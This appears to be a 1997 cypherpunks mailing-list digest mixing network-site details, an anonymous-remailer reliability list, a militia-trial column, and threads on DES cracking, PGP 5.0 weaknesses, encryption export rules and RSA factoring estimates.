taken from the average of a continous ping that I use as a baseline. When Majordomo receives a submission it then immediately resends it. Assuming the pipe ain't clogged and I run about 15% use with an all time max of about 90%. Usualy, taken from listening to the hard drive chatter, the resend latency is about 30s to 5m when the pipe gets heavily used. Typical peak usage is very sporadic and never lasts more than 5 minutes or so. There are two other small networks dialed in 28.8 that are the major driver of the intermittent loads. One is a commercial video business and the other is a local Amiga/NT/Mac/Linux BBS (Phantoms Mansion, oldest surviving bbs in Austin, in existance since '82. I started in '83). Our current expansion plans are to take the main pipe to a T1 sometime toward the end of next month. We will then upgrade the dial-ins to ISDN and adding a intermittent ISDN dial-in along with 2 28.8 dial-ins. The two dedicated dial-ins will also be expanding to ISDN and I am adding another dedicated ISDN customer network as well. SSZ has been on ISDN since Oct. of '92 and in that time we have been down for more than hours on two occassions. The first was on Mar. 20, 1995 when one of my lodgers managed to burn the house down. The second was around last New Year when I moved and SWBT couldn't move the ISDN for 21 days. We used a 28.8 during that time and physical latency was about 150mS or so. The current move scheduled for about 3 weeks away is expected to be accomplished in less than an hour so hopefuly nobody will even notice... I currently only echo messages to algebra.com because their the only ones who've asked. We currently are subscribed to toad.com and algebra.com. We have an open subscription policy meaning all it takes is an inquiry... Currently the only reason there would be a significant delay is that we on occassion have majordomo barf on itself and erase the subscribers list. But we have a backup and it only takes a cp to get it back up, this process is not automated - hence the delay. Considering the old versions of Linux and Majordomo (nearly 4 years old) this is remarkable to me since it is the only major glitch in the software. We are expecting to upgrade einstein to a Pentium box with much newer software during next month as well. Our policy on submissions to the list is one of complete hands-off except for checking for duplicates and loops. Other boxes that are intermittently available through SSZ and drive our load are: newton.ssz.com Pentium running Linux and is the router for our Elgin, Tx. expansion site expected to come online before the new year permanently. hawking.ssz.com Being built for the Lockheart, Tx. expansion slated for next summer. godzilla.ssz.com Sun Sparc ELC running Solaris 2.5 intended as a IRC server and should be permanently online toward the end of next month. kingkong.ssz.com Tadpole 3XP laptop running Solaris 2.5 and is a personal workstation. smoke.ssz.com Amiga Video Toaster used as a personal graphics workstation, it also intermittently feeds real-time video. Named after 'Smoke Jaguar' the last great Aztec king before the Spaniards arrived. dustworks.ssz.com 486DX3 100 running Win95 used as a personal workstation. tesla.ssz.com Pentium II running Win95 used as a personal workstation. escher.ssz.com Pentium running Linux used to grab resume's off the web via spiders. Once a day but when it runs its load is about 80% and lasts for around 5 minutes with several minutes between bursts (intentional behaviour) and lasts for about an hour, scheduled for early AM. cthulhu.ssz.com Intended to support a data haven project being developed by the owner of the dh-l data haven mailing list. There you go, hope it helps better understand the SSZ site at least. ____________________________________________________________________ | | | Participation requires more than just bitching! | | | | _____ The Armadillo Group | | ,::////;::-. Austin, Tx. USA | | /:'///// ``::>/|/ http:// www.ssz.com/ | | .', |||| `/( e\ | | -====~~mm-'`-```-mm --'- Jim Choate | | ravage at ssz.com | | 512-451-7087 | |____________________________________________________________________| From raph at CS.Berkeley.EDU Mon Aug 25 07:21:35 1997 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 25 Aug 1997 22:21:35 +0800 Subject: List of reliable remailers Message-ID: <199708251350.GAA29444@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{'cyber'} = ' alpha pgp'; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"jam"} = " cpunk mix pgp hash middle latent cut ek"; $remailer{"winsock"} = " cpunk pgp pgponly hash cut ksub reord ?"; $remailer{'nym'} = ' newnym pgp'; $remailer{"squirrel"} = " cpunk mix pgp pgponly hash latent cut ek"; $remailer{'weasel'} = ' newnym pgp'; $remailer{"reno"} = " cpunk mix pgp hash middle latent cut ek reord ?"; $remailer{"cracker"} = " cpunk mix remix pgp hash ksub esub latent cut ek reord post"; $remailer{'redneck'} = ' newnym pgp'; $remailer{"bureau42"} = " cpunk mix pgp ksub hash latent cut ek"; $remailer{"neva"} = " cpunk pgp pgponly hash cut ksub ?"; $remailer{"lcs"} = " mix"; $remailer{"medusa"} = " mix middle" $remailer{"McCain"} = " mix middle"; $remailer{"valdeez"} = " cpunk pgp pgponly hash ek"; $remailer{"arrid"} = " cpunk pgp pgponly hash ek"; $remailer{"hera"} = " cpunk pgp pgponly hash ek"; $remailer{"htuttle"} = " cpunk pgp hash latent cut post ek"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. remailer at crynwr.com is _not_ a remailer. There is no remailer at relay.com. Groups of remailers sharing a machine or operator: (cyber mix reno winsock) (weasel squirrel medusa) (cracker redneck) (nym lcs) (valdeez arrid hera) The remailer list here has been out of date for some time, but should be up to date now. I'm still working on updating the web page. Last update: Mon 25 Aug 97 6:48:42 PDT remailer email address history latency uptime ----------------------------------------------------------------------- redneck config at anon.efga.org *#+**###*#+# 1:42 99.99% nym config at nym.alias.net +++###*+#+## 4:24 99.99% cracker remailer at anon.efga.org +++++-++++++ 20:07 99.97% weasel config at weasel.owl.de +--+--+--+++ 1:52:17 99.96% arrid arrid at juno.com +-++-++---- 2:57:11 99.90% hera goddesshera at juno.com ----------.- 8:59:19 99.89% winsock winsock at rigel.cyberpass.net --+-------+ 4:22:37 99.83% bureau42 remailer at bureau42.ml.org -----------+ 2:38:44 99.75% cyber alias at alias.cyberpass.net ++**+**+**++ 14:02 99.74% mix mixmaster at remail.obscura.com ++*++**++++ 20:35 99.67% replay remailer at replay.com + *** * +*** 6:51 99.18% valdeez valdeez at juno.com +---------- 9:25:25 99.06% squirrel mix at squirrel.owl.de ----------- 3:45:55 98.53% jam remailer at cypherpunks.ca ---** *+++++ 52:44 97.92% neva remailer at neva.org ---****** +# 28:32 97.63% reno middleman at cyberpass.net ++--+ + +- 46:04 94.86% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From anon at anon.efga.org Mon Aug 25 22:44:07 1997 From: anon at anon.efga.org (Anonymous) Date: Mon, 25 Aug 1997 22:44:07 -0700 (PDT) Subject: I've got a Volvo (and I'm not afraid to use it!) Message-ID: FROM MOUNTAIN MEDIA THE LIBERTARIAN, By Vin Suprynowicz 'The fight's over. There's no one left to fight' "There's no way to rule innocent men. The only power any government has is the power to crack down on criminals. Well, when there aren't enough criminals, one makes them. One declares so many things to be a crime that it becomes impossible to live without breaking laws." -- Ayn Rand, "Atlas Shrugged" On June 4, 1997 the trial of the only Viper Militia defendant to face a jury -- after months in jail, 10 have pleaded guilty to one charge or another, while one still awaits trial -- got underway before Judge Earl H. Carroll in the federal district courthouse in downtown Phoenix. ... Defense attorney Ivan Abrams objected to the government's hauling machine guns belonging to other Vipers into the courtroom, since Knight was not charged with owning any such weapons. Objection overruled. I told Knight I'd heard that some of the "unregistered machine guns" presented by the prosecution had actually been built by the government out of spare parts found at the homes of the various militia members. "This is the way the law reads: If they can take parts and with eight hours of professional work by professional gunsmiths working full time in Washington, D.C., make it fire more than one round, then it was a machine gun. There was a guy who published a magazine piece on this a couple of years ago, a guy who took a wrecked Volvo and in about seven hours made a weapon that would fire four or five rounds. So by the legal definition used in this case the Volvo was, technically, a machine gun. We're talking about professional gunsmiths, with access to sophisticated machine shops." From apache at bear.apana.org.au Mon Aug 25 07:55:37 1997 From: apache at bear.apana.org.au (apache at bear.apana.org.au) Date: Mon, 25 Aug 1997 22:55:37 +0800 Subject: TEST Message-ID: <199708251441.AAA08053@bear.apana.org.au> latency test From rab at stallion.oz.au Mon Aug 25 22:59:47 1997 From: rab at stallion.oz.au (rab at stallion.oz.au) Date: Mon, 25 Aug 1997 22:59:47 -0700 (PDT) Subject: Mathematics > NSA + GCHQ Message-ID: This thread touches a memory of mine from 18 years ago when I was at university. While studying for a mathematics exam I became sidetracked by one of Fermat's Theorems (Last? or Little?) and am convinced to this day that I came up with an algorithm for determining if a number was prime by a "simple" combination of shifts and logical operations. The beast part was that the amount of calculation was linearly related to the number of bits in the binary representation of the number. I only ever spent a couple of hours on it, working through it on paper, and after the exams were finished and I went back to it I could not find the original notes and I could not remember exactly what I had done. However it seems like someone else has... > ---------- > From: Dr.Dimitri Vulis KOTM[SMTP:dlv at bwalk.dm.com] > Sent: Saturday, 23 August 1997 7:12 > To: cypherpunks at toad.com > Subject: Re: Mathematics > NSA + GCHQ > > > John Young writes: > > > Along this line: > > > > A few days ago we received an 8-page excerpt from "Shift Register > > Sequences," by Solomon W. Golomb (at USC), Holden-Day, Inc., > > no date, with a handwritten note: > > > > NSA has tried to suppress knowledge of this stuff. Nearly all NSA > 'good' > > algorithms are based on this technology. > > > > IANAM, so would any of the mathematicians here give any credibility > to > > this claim? We'll scan and put the excerpt on our Web site if > worthwhile. > > It's composed of the book's 3 page preface and 5 pages of text and > > diagrams of Chapter 2 on The Shift Register as a Finite State > Machine, > > with principal focus on de Bruijn diagrams for shift registers. > > The NSA certainly did try to suppress much shift-register-related > stuff. > > The recent Sandia lawsuit is over shift register stuff. > > There are increasingly persistent rumor of a fast factoring algorithm > based on shift registers. > > Therefore anything mentioning them is of interest. > > But: Was there any info in the package other than the passages from > the book? > > I don't think it's a good idea to put up chunks of the book - the > publisher > might cry copyright infringement, and everybody probably has it > anyway. > > [I'm about to turn off this box, so I won't see any responses in a > while.] > > --- > > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, > 14.4Kbps > From trei at process.com Mon Aug 25 08:00:50 1997 From: trei at process.com (Peter Trei) Date: Mon, 25 Aug 1997 23:00:50 +0800 Subject: Mathematics > NSA + GCHQ Message-ID: <199708251438.HAA13796@toad.com> Lucky Green writes: > At 12:12 PM 8/23/97 -0400, nospam-seesignature at ceddec.com wrote: > >DEScrack was only done on a relatively few computers. If a really big > >prize was offered (In this lotto, you just run this screen saver which > >uses less bandwidth than pointcast... The chinese radio lottery via the > >internet), you could get almost every computer into the act. The number of machines working on DESCrack was probably in the 20-30,000 range. > This is a good point. It took $10,000 (plus some hope for fame) to motivate > thousands of computer users to participate in DESCHALL. But $10k is not > all that much money. Few people will go to extraordinary measures to get a > long shot chance at winning this relatively small sum. Note that there were > few DESCHALL participants from China, India, and other countries where > there is a substantial numbers of computers. Actually, most participants worked without any expectation of getting the full $10k. DESChall gave the finder of the magic key $4k, the organizers $2k, with the rest going to charity. In the European effort, aside from a few hundred dollars to cover expenses, the entire amount would have gone to Project Gutenburg (as it did in the 48 bit RC5 crack). Only people running uncoordinated searches, such as Mikkelsen's Bryddes or my Deskr, could look forward to receiving the entire prize. Interestingly, many of the European workers looked on the monetary award with disdain - they participated 'to show Internet user solidarity', and other such reasons. Also, many were using university owned machines, and were legally constrained from accepting money earned from their use. This came as quite a suprise to me. I had picked the $10k figure in my proposal to RSA because it fell in the range of other prizes they had offered, and seemed high enough to motivate people with no emotional or ideological interest in the issues to run free software. >BTW, I am thinking about organizing corporate sponsorships to beef up >the reward for the RC5-64 crack. I am quite certain that at a $1M >prize offering, I would be cracked faster than DES. I think the effort would be better spent on a factoring challenge. [...] > --Lucky Green Peter Trei trei at Process.com From apache at bear.apana.org.au Mon Aug 25 08:01:00 1997 From: apache at bear.apana.org.au (apache at bear.apana.org.au) Date: Mon, 25 Aug 1997 23:01:00 +0800 Subject: TEST Message-ID: <199708251441.AAA08040@bear.apana.org.au> latency test From ravage at ssz.com Mon Aug 25 08:18:39 1997 From: ravage at ssz.com (Jim Choate) Date: Mon, 25 Aug 1997 23:18:39 +0800 Subject: index.html Message-ID: <199708251517.KAA00346@einstein.ssz.com> CNN logo Navigation Infoseek/Big Yellow Pathfinder/Warner Bros Main banner Reservation Desk rule CHILDREN ACCUSED OF TRYING TO POISON TEACHER August 24, 1997 Web posted at: 8:31 p.m. EDT (0031 GMT) HAMPTON, Virginia (CNN) -- Four pupils have been charged with felonies for allegedly planning to poison their fifth-grade teacher with a mixture of oils, soaps and household cleaners. The two boys and two girls, now ages 10 and 11, were charged as juveniles Friday with attempting to poison and conspiracy to commit a felony, said Jeff Walden, spokesman for the Hampton Police Department. The names of the youngsters and the teacher were withheld. On January 15, a classmate overheard the four pupils discussing ways to kill their teacher, and told school authorities, Walden said. The principal confronted each pupil and found one carrying a glass vial containing a liquid that allegedly was to be used to poison the teacher's food. The four weren't charged until now, because authorities had to wait for laboratory test results, police said. The tests indicated the mixture would have made the teacher sick, but would not necessarily have killed her. The Associated Press contributed to this report. rule Related site: Note: Page will open in a new browser window * City of Hampton, Virginia External sites are not endorsed by CNN Interactive. _________________________________________________________________ Infoseek search ____________________ ____ ____ _________________________________________________________________ rule Message Boards Sound off on our message boards You said it... [INLINE] Reservation Desk rule To the top � 1997 Cable News Network, Inc. All Rights Reserved. Terms under which this service is provided to you. From patrick at atro.pine.nl Mon Aug 25 23:45:36 1997 From: patrick at atro.pine.nl (Patrick Oonk) Date: Mon, 25 Aug 1997 23:45:36 -0700 (PDT) Subject: BoS: Bug bugs privacy file but a fix is on the way (fwd) Message-ID: <199708260645.IAA23433@atro.pine.nl> Forwarded message: >From best-of-security-request at cyber.com.au Tue Aug 26 08:30:09 1997 Resent-Date: Tue, 26 Aug 1997 16:16:35 +1000 (EST) From: darrenr at melb.convergent.com.au (Darren Reed) Message-Id: <199708260343.NAA08202 at duchess.melb.arcsystems.com.au> Date: Tue, 26 Aug 1997 13:43:37 +1000 (EST) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: darrenr at cyber.com.au Old-Status: O Resent-Message-ID: <"kYO8a.A.IkC.-PmA0"@plum> X-Loop: best-of-security at cyber.com.au Errors-To: best-of-security-request at cyber.com.au Precedence: list Resent-Sender: best-of-security-request at cyber.com.au To: best-of-security at cyber.com.au Resent-From: best-of-security at cyber.com.au X-OS: FreeBSD3.0-current X-Mailing-List: ftp://ftp.cyber.com.au/pub/archive/b-o-s/ X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request at cyber.com.au with Subject: unsubscribe Subject: BoS: Bug bugs privacy file but a fix is on the way A "flaw" in the encryption program PGP 5.0 was reported to the Australian security organisation AusCERT lat week, and a recommended fix was issued later in the week. Security consultant Paul Drake, an expatriate Australian working for a company called NetSafe, said he had discovered a bug that menat PGP 5.0 (for "Pretty Good Privacy") kept passwords in memory "at all times", as well as part of the text of whatever had been encrypted. The keyfile was also being kept in a relatively insecure file, he said. AusCERT confirmed the problem had been reported and said they were investigating. PGP advocate peter Moon, who is pushing for wider use of the software in Australia, said while the problems pointed out by Drake were "valid", they were more weak points than "bugs". "The PGP encrpytion algorithm is - as anyone knows - as solid as a rock. The attacks are all based on the principal that if you want to break into the strongest box in the world, the easiest way is to pinch thekey." He said a product called bcwipe could clear the saved information and the keyfile should probably be deleted altogether. Drake said PGP, a United States-based company, would release "PGP 5.01" without the problem. -- Jenny Sinclair, Page D4, The Age, Tuesday 26 August 1997 -- | Patrick Oonk - http://patrick.mypage.org/ - patrick at pine.nl | | PGP Key ID 0xDA2E93FA - Internic PO59 - | | Pine Internet B.V. Consultancy, installatie en beheer | | Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ | From alan at ctrl-alt-del.com Mon Aug 25 08:46:36 1997 From: alan at ctrl-alt-del.com (Alan) Date: Mon, 25 Aug 1997 23:46:36 +0800 Subject: BXA Meet in Portland OR In-Reply-To: <1.5.4.32.19970825121003.00712010@pop.pipeline.com> Message-ID: On Mon, 25 Aug 1997, John Young wrote: > Date: Mon, 25 Aug 1997 08:10:03 -0400 > From: John Young > To: cypherpunks at toad.com > Subject: BXA Meet in Portland OR > > > Any chance someone NW can attend this and report? > > Federal Register: August 25, 1997 (Volume 62, Number 164) I am going to try very hard to be there. It claims that statements will be taken on the EAR. Anyone want to help write a statement to be read to the commitee? (I wonder if you have to declare "I am not, nor have I ever been, a member of the Cypherpunk party." before reading a statement.) alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From JonWienk at ix.netcom.com Mon Aug 25 23:57:48 1997 From: JonWienk at ix.netcom.com (Jonathan Wienke) Date: Mon, 25 Aug 1997 23:57:48 -0700 (PDT) Subject: Commerce Department encryption rules declared unconstitutional In-Reply-To: Message-ID: <3.0.3.32.19970825235313.006d8f0c@popd.netcruiser> At 07:39 PM 8/25/97 -0700, Declan McCullagh wrote: >A Federal judge in San Francisco ruled today that the Commerce >Department's export controls on encryption products violate the >First Amendment's guarantees of freedom of speech. > >In a 35-page decision, U.S. District Judge Marilyn Patel said the >Clinton administration's rules violate "the First Amendment on the >grounds of prior restraint and are, therefore, unconstitutional." >Patel reaffirmed her December 1996 decision against the State >Department regulations, saying that the newer Commerce Department >rules suffer from similar constitutional infirmities. > >Patel barred the government from "threatening, detaining, >prosecuting, discouraging, or otherwise interfering with" anyone >"who uses, discusses, or publishes or seeks to use, discuss or >publish plaintiff's encryption programs and related materials." >Daniel Bernstein, now a math professor at the University of >Illinois, filed the lawsuit with the help of the Electronic >Frontier Foundation. So if someone posts a few lines of source code to coderpunks, the government reserves the right to prosecute, unless the poster's name is Daniel Bernstein, and the algorithm is Snuffle 5.0. The judge seems to be saying "I think Bernstein's case has merit, so I will order the government to stop hassling him, but since I am too chickenbleep to challenge the unconstitutional usurpation of power on the part of Clinton, Congress, the State Dept., and the Dept. of Commerce, I will pass the buck and let the issue be decided on appeal." The decision seems to be a step in the right direction, but a VERY small one. Jonathan Wienke What part of "the right of the people to keep and bear Arms, shall not be infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution) When everyone is armed, criminals fear everyone, not just the police. PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1 3A8F 778A 7407 2928 DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA 4878 C245 D245 EAA7 0DCC Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred. US/Canadian Windows 95/NT or Mac users: Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/ Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html Commercial version of PGP 5.0 and related products at http://www.pgp.com Eudora Light + PGP = Free, Convenient Communication Privacy -------------- next part -------------- A non-text attachment was scrubbed... Name: pgp00008.pgp Type: application/octet-stream Size: 237 bytes Desc: "PGP signature" URL: From jya at pipeline.com Mon Aug 25 08:58:16 1997 From: jya at pipeline.com (John Young) Date: Mon, 25 Aug 1997 23:58:16 +0800 Subject: BXA Meet in Portland OR Message-ID: <1.5.4.32.19970825153421.00741588@pop.pipeline.com> Alan Olsen wrote: >I am going to try very hard to be there. It claims that statements will >be taken on the EAR. Anyone want to help write a statement to be read to >the commitee? An excellent start would be Adam Shostack's questioning of the legal authority for the feds to restrict publishing. See his Tom Paine taunt in Peter Wayner's NYT report yesterday, and as posted here. Declaring yourself to be a cpunk, well, can you get a hearing at a hearing of closed EARs any better way? From anon at anon.efga.org Tue Aug 26 00:03:51 1997 From: anon at anon.efga.org (Anonymous) Date: Tue, 26 Aug 1997 00:03:51 -0700 (PDT) Subject: The Rest of the Story / Re: I've got a Volvo (and I'm not afraid to use it!) Message-ID: <40b9f17aeb2a63e431203ac0de012e20@anon.efga.org> Anonymous wrote: > FROM MOUNTAIN MEDIA > THE LIBERTARIAN, By Vin Suprynowicz > 'The fight's over. There's no one left to fight' > On June 4, 1997 the trial of the only Viper Militia defendant to face > a jury -- after months in jail, 10 have pleaded guilty to one charge or > another, while one still awaits trial -- got underway before Judge Earl > H. Carroll in the federal district courthouse in downtown Phoenix. # # # I asked Knight what he believes the government's real goal is, in pressing such prosecutions. "Their goal is to disarm the public. This is to make sure everyone knows that if they can put me in prison for five years for going out to two field exercises in six months, after 15 years in business in this town, meeting the public all day every day, a church-going guy, a good father ... if we can throw this guy in prison, think what we can do to you. ... "When the jury came back hung, and he asked them if there was any chance of reaching a verdict if he sent them back and they said no, (the judge) was bound by law to declare a mistrial, but he did not. ... Instead he sent them back. And I have a feeling the jury thought they were going to be there forever if they didn't come back with a unanimous verdict. ... # # # "Aren't they just speeding up Darwinism?" I asked attorney Abrams of the government's prosecutions of these highly-visible, "public" militia units. By shutting down the goofier militias, the guys who parade around in public in camouflage fatigues, aren't they just teaching those who profoundly fear and distrust the government how to be more secretive, more serious, more professional ... and simultaneously walling them off from the influence of more moderate voices? "But that's what they want to do," the self-described liberal Democrat replied. "Look at the War on Drugs, which is dependent on evil men with evil-sounding Hispanic names: Marcos Fernando Guzman. And the more of them we can create, we have our enemy and our target and then we can create our government agency. It is to the government's advantage to make more and badder militias, because the worse they are, the more agencies like the ATF can come out and say, 'We are the first line of defense, we are saving the nation from ruin, we need money from Congress.' ... "You put these guys from New York out here where the real disaffection is, and they'll be shocked first of all at the depth of it. I'm shocked at the depth of the disaffection, but also at the way it permeates all layers of society. I don't know anyone who trusts the government, including my father who has a PhD law degree, but you get him out here for a breath of fresh air, and he starts to talk like one of them. ... Contributions to help fund Chuck Knight's appeal may be sent to the Charles Knight Legal Defense Fund, Account No. 14928432, Bank One, 4922 E. Bell Road, Scottsdale Ariz. 85251 Vin Suprynowicz is the assistant editorial page editor of the Las Vegas Review-Journal. Readers may contact him via e-mail at vin at lvrj.com. The web site for the Suprynowicz column is at http://www.nguworld.com/vindex/. The column is syndicated in the United States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas Nev. 89127. This essay originally appeared in the September, 1997 edition of "The Rothbard-Rockwell Report." *** From alan at ctrl-alt-del.com Mon Aug 25 09:07:39 1997 From: alan at ctrl-alt-del.com (Alan) Date: Tue, 26 Aug 1997 00:07:39 +0800 Subject: BXA Meet in Portland OR In-Reply-To: <1.5.4.32.19970825153421.00741588@pop.pipeline.com> Message-ID: On Mon, 25 Aug 1997, John Young wrote: > Declaring yourself to be a cpunk, well, can you get a hearing at a > hearing of closed EARs any better way? I was thinking of a more Hamletonian response of pouring poison in the EAR. alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From Michael.Johnson at mejl.com Tue Aug 26 00:18:43 1997 From: Michael.Johnson at mejl.com (Mike) Date: Tue, 26 Aug 1997 00:18:43 -0700 (PDT) Subject: Dial in authentication Message-ID: <3.0.3.32.19970826091500.00984310@localhost> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 What products could be used for dial in authentication? I am interested in something like a piece of hardware that shows one time passwords and allows users of Win95/NT4 to dial in to an NT/Unix network and use NetBIOS/TCP file servers. Can anybody recommend something is this area? Is it possible to export strong authentication products from the US, or is it necessary to purchase the hardware from abroad to allow international users to dial in? Mike -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAKQRsUc8bdD9cnfEQIETACgy1W5aJLOfnHKnnmPeE2HQf925QgAn1bS s6nH12HKSBmwtVRvV0MyhdLC =f9eC -----END PGP SIGNATURE----- Mike. From shamrock at netcom.com Mon Aug 25 09:31:51 1997 From: shamrock at netcom.com (Lucky Green) Date: Tue, 26 Aug 1997 00:31:51 +0800 Subject: Mathematics > NSA + GCHQ In-Reply-To: <199708251440.HAA22883@netcom18.netcom.com> Message-ID: <3.0.2.32.19970825090759.007087d0@netcom10.netcom.com> At 10:41 AM 8/25/97 -6, Peter Trei wrote: >Interestingly, many of the European workers looked on the monetary >award with disdain - they participated 'to show Internet user >solidarity', and other such reasons. Also, many were using university >owned machines, and were legally constrained from accepting money >earned from their use. I am sure the university will make an exception to the rule once a $1M check for the regents arrives. The Internet idealists are your base for any distributed crack. But the cracks that come next are too complex to be performed by just your base. As in an election, you have to reach beyond your base to win. The students can show their solidarity. It will require tempting cash offers before large scale distributed cracks can suck cycles from the millions of computers in other environments. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From jsmith58 at hotmail.com Mon Aug 25 09:39:03 1997 From: jsmith58 at hotmail.com (John Smith) Date: Tue, 26 Aug 1997 00:39:03 +0800 Subject: PGP5i supports RSA keys? Message-ID: <19970825162815.1328.qmail@hotmail.com> >TWAK! > >Barring a _severe_ breakthrough in the entire nature of computing, >you still >need at least 1 atom to store one bit of information. It would take >more >computing power than all the atoms in the world, with the ability to >store 1 bit >on a atom and other dazzling feats of miniaturization, to crack a >2048 bit key >barring algorithmic breakthrough. TWOK! Au contraire, mon ami... Breaking a 2048 bit key is approximately 1E16 (10 to the 16th power) harder than breaking a 512 bit key. The RSA-129 factoring effort broke a key of approximately 430 bits using about 6,000 MIPS years. That is about 2E17 instructions. Some estimates are that with current algorithms, a 512 bit key could be broken with not too much more work. If so, the total work to factor a 2048 bit key would be roughly 1E33 instructions. Eric Drexler estimates that with nanotech, it should be possible to create a 1 GHz processer that fits in 1/8 of a cubic micron. It would take 1E24 such processors to factor a 2048 bit number. If we wanted to factor that 2048 bit key in 1E6 seconds, a couple of weeks, we would need 1E18 processors, which would fit in a cube 100,000 microns on a side. This is 10 cm on a side, about the volume of a soccer ball. A far cry from the whole earth, no? "John ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From trei at process.com Mon Aug 25 09:43:59 1997 From: trei at process.com (Peter Trei) Date: Tue, 26 Aug 1997 00:43:59 +0800 Subject: Welfare / Norplant Message-ID: <199708251623.JAA15070@toad.com> Several years ago I came up with a little variation on the Welfare Mother problem which I thought was a lot more palatable. Offer a 'birthday present' program, under which *any* female over the age of 11 who has not yet had a child or become pregnant, on her birthday, gets a cash award. The award should be high enough to encourage participation; $250 seems about right. A woman who can deliberatly turn down a $250 lump sum every year for the rest of her life is almost certainly able to afford to raise a child. This scheme: * Is entirely voluntary; no one has to use contraceptives, stay off welfare, or anything else. * Targets young women who would be likely to become 'welfare mothers'. The parents of such young women would be highly motivated to have their dependent daughters participate. I haven't worked out the costs, but suspect that the net savings would be quite substantial. Peter Trei trei at Process.com Disclaimer: The above is my personal opinion. I dont suggest that any other person or oganization shares it. From jya at pipeline.com Mon Aug 25 09:44:11 1997 From: jya at pipeline.com (John Young) Date: Tue, 26 Aug 1997 00:44:11 +0800 Subject: BXA Meet in Portland OR Message-ID: <1.5.4.32.19970825162207.0074b2b0@pop.pipeline.com> John Young wrote to Alan Olsen: > >>I am going to try very hard to be there. It claims that statements will >>be taken on the EAR. Anyone want to help write a statement to be read to >>the commitee? > >An excellent start would be Adam Shostack's questioning of the >legal authority for the feds to restrict publishing. See his Tom Paine >taunt in Peter Wayner's NYT report yesterday, and as posted here. > >Declaring yourself to be a cpunk, well, can you get a hearing at a >hearing of closed EARs any better way? There's a small mountain of info available on the EAR, Wassenaar, and the unfolding crypto regs, providing anyone wants to consult it. Michael Foomkin has reviewed the legal gounds for continuing the "national emergency" undergirding the repeatedly extended period for not legislating up-to-date export regulations. To put off the fight to pass a new law, every August, as done a few days ago (http://jya.com/eo081997.txt), the presiding president issues an executive order under the International Emergency Economic Power Act (IEEPA) extending the national emergency initially declared during what appeared to be a genuine national threat decades ago. It is these series of orders that legalize the EARs, and a lot more, so I read, beyond our decryption of the state/mil/com multi-level DMS. See Michael's site for more on IEEPA and much more A-1 crypto-legal stuff at: http://www.law.miami.edu/~froomkin/froomkin.html We've documented some of the more recent EAR shenanigans on our site at: http://jya.com/eartoc.htm Similarly, background and foreground on the status of BXA implementation of the Wassenaar Arrangement, to be discussed at the Portland meet, is available on Greg Broiles site at: http://www.parrhesia.com And at our site at: http://jya.com/wa/watoc.htm BXA has written me that the bureau expects to issue regulations implementing Wassenaar "this summer," international-oriented regs which will cover the full spectrum of dual-use and militarily critical technologies.The current draft CCL regs circulating for domestic applications seems to part of an orchestrated campaign to address all export issues -- domestic and international -- at once, using one to leverage the other. Something similar appears to be taking place worldwide. See Bert-Jaap Koop's ever-changing survey of world crypto law at: http://cwis.kub.nl/~frw/people/koops/jenc8bjk.htm Even so, it'll be hard to wade through all this e-paper pile before the meet, and probably would not be effective anyway, for the meet's sponsors know all that and couldn't give a shit. A heavy-metal instrument is needed to turn their attention away from impenetrable legal and military and NDA-commercial protection. Now we turn the target-finder over to Mr. Tim May and those anonymees worldwide who wish to ... lock and load, wait, not guns, even more powerful munitions to 